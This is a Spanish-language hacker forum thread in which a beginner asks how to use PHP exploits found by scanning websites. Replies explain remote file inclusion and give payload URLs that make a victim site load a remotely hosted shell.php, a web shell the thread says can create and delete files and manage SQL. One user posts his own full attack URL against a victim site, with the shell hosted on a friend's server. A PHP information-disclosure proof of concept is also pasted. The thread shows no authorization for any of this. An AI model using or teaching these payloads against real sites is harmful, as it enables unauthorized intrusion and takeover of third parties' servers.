Exploits php, ayuda

Hola, tengo una duda, al buscar vulnerabilidades a una web, solo me salen con exploits php, y no he encontrado como usarlos :-\ , algo he leido x ahi k tengo k subirlos a una web, pero cuando copio todo el exploit que me da la pagina
Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion y trato de subirlo me da error desde la primera linea Sad

(lycos, iespana). Estoy haciendo algo mal?
Si me lo piden puedo colgar el exploit k me da securityfocus, y k me ayuden.Gracias

Mejor aki estan los links: (todos risk level: high y con un quick scan)

Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion

Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion

Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion

Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion

Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion (como lo compilo? no sale si es c, perl o php Huh

)

Agradeceria muxo k me digan k hace cada exploit, como compilarlos (si es php, a k server subirlo xq no me funciona con los k he dixo antes Huh

) y como explotar las vulnerabilidades de estos, k sobre este tema recien me he metido ayer y deseo aprender mas, espero ir mejorando con su ayuda

me parece que estas haciendo mal..

Citar

Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion (como lo compilo? no sale si es c, perl o php Huh )

No se ejecuta..
esto es asi

Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.tupagina.com/shell.php

fijate en la ultima parte... shell.php

esa shell lo tns que subir a una pagina web cualquier que soporte php...

con la shell podes crear, borrar archivos, ver el contenido entero, manejar sql... etc

----------------------------------------------------------------------------------------------------

Este por ejemplo (La verdad que no me fije que hace)

Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion
Se utiliza asi

Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://downloads.securityfocus.com/vulnerabilities/exploits/phpflaw.obj

Ahora ya no es mas la shell.php, ahora se ejecutara lo que hace en es pagina exploits/phpflaw.obj..

esto es una RFI(remote files inclussion) ejecuta phpflaw.obj.. como si fuera un archivo interno de la pagina web..

-------------------------------------------------------------------------------------------------------------
los otros exploit no me fije, pero sera algo similar

cualquier cosa pregunta no mas, que para eso estamos

salu2

la verdad que no se si lycos e iespana soporta php, solo buscate en google: free hosting with php

SQL (Structured Query Language) es un lenguaje para menejo de bases de datos.

creo que tengo el mismo problema...
tengo el exploit php lo subi con el smartftp a un hosting de un amigo: entonces la direccion seria
Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion

www.dkns.us/damiguero/shell.php

verdad?

entonces todo el codigo seria:

Código:

http://www.miwebvictima.com/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.dkns.us/damiguero/shell.php

antes hice esto: el codigo lo puse en el block de notas y le di extension php, luego lo subi con el smartftp

pd.- este me sale despues del escaneo en la seccion EXPLOIT:

Código:

PHP Html_Entity_Decode() Information Disclosure Vulnerability

An exploit is not required.

The following proof of concept is available:

<?php

$foobar=html_entity_decode($_GET['foo']);
echo $foobar;

?>

Running it with url:

http://www.example.com/index.php?foo=%00sssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss
ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss
ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss
ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss
ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss
sssssssssssssssssssssssssssssss ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss!
ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss
ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss
ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss
ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss
sssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss sssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss
sssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss!
ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss
ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss
ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss
ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss
ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss

	Bienvenido(a), Visitante. Favor de ingresar o registrarse. ¿Perdiste tu email de activación? - Julio 20, 2008, 01:47:41 Boton Buscar